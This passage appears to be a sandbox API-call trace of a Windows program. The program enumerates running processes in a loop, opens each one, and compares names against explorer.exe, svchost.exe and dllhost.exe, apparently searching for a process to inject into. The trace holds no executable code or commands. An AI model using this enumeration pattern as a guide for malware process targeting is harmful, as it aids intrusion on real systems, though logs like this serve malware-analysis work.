th32DefaultHeapID=0xaa8, th32ModuleID=0x278301, cntThreads=0x0, th32ParentProcessID=0x77056270, pcPriClassBase=0, dwFlags=0x76fd9604, szExeFile="")) returned 0 [0171.376] CloseHandle (hObject=0xd4) returned 1 [0171.376] Sleep (dwMilliseconds=0x3e8) [0172.466] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0172.469] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0172.469] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0172.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0172.470] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0172.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0172.470] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0172.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0172.471] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0172.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0172.471] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0172.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0172.472] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0172.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0172.472] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0172.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0172.473] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0172.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0172.473] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0172.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0172.474] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0172.474] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0172.475] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0172.475] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0172.476] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0172.476] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0172.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0172.477] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0172.477] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0172.478] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0172.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0172.478] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.478] CloseHandle (hObject=0xd8) returned 1 [0172.478] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0172.478] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0172.478] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0172.478] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0172.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0172.479] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0172.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0172.479] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.479] CloseHandle (hObject=0xd8) returned 1 [0172.480] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0172.480] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0172.480] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0172.480] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0172.480] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0172.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0172.481] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0172.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0172.481] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.481] CloseHandle (hObject=0xd8) returned 1 [0172.481] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0172.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0172.482] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.482] CloseHandle (hObject=0xd8) returned 1 [0172.482] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0172.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0172.482] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.482] CloseHandle (hObject=0xd8) returned 1 [0172.483] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0172.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0172.483] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.483] CloseHandle (hObject=0xd8) returned 1 [0172.483] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0172.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0172.484] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.484] CloseHandle (hObject=0xd8) returned 1 [0172.484] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0172.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0172.484] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.484] CloseHandle (hObject=0xd8) returned 1 [0172.484] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0172.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0172.485] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.485] CloseHandle (hObject=0xd8) returned 1 [0172.485] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0172.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0172.485] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.486] CloseHandle (hObject=0xd8) returned 1 [0172.486] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0172.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0172.486] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.486] CloseHandle (hObject=0xd8) returned 1 [0172.486] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0172.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0172.487] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.487] CloseHandle (hObject=0xd8) returned 1 [0172.487] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0172.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0172.487] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.487] CloseHandle (hObject=0xd8) returned 1 [0172.487] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0172.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0172.488] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.488] CloseHandle (hObject=0xd8) returned 1 [0172.488] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0172.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0172.489] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.489] CloseHandle (hObject=0xd8) returned 1 [0172.489] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0172.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0172.489] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.489] CloseHandle (hObject=0xd8) returned 1 [0172.489] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0172.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0172.490] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.490] CloseHandle (hObject=0xd8) returned 1 [0172.490] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0172.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0172.490] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.490] CloseHandle (hObject=0xd8) returned 1 [0172.490] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0172.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0172.491] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.491] CloseHandle (hObject=0xd8) returned 1 [0172.491] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0172.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0172.491] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.492] CloseHandle (hObject=0xd8) returned 1 [0172.492] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0172.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0172.492] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.492] CloseHandle (hObject=0xd8) returned 1 [0172.492] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0172.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0172.493] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.493] CloseHandle (hObject=0xd8) returned 1 [0172.493] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0172.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0172.493] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.493] CloseHandle (hObject=0xd8) returned 1 [0172.493] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0172.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0172.494] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0172.494] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0172.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0172.495] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0172.495] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0172.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0172.496] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0172.496] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0172.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0172.497] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.497] CloseHandle (hObject=0xd8) returned 1 [0172.497] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0172.497] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0172.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0172.498] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0172.498] CloseHandle (hObject=0xd8) returned 1 [0172.498] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0172.498] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0172.498] 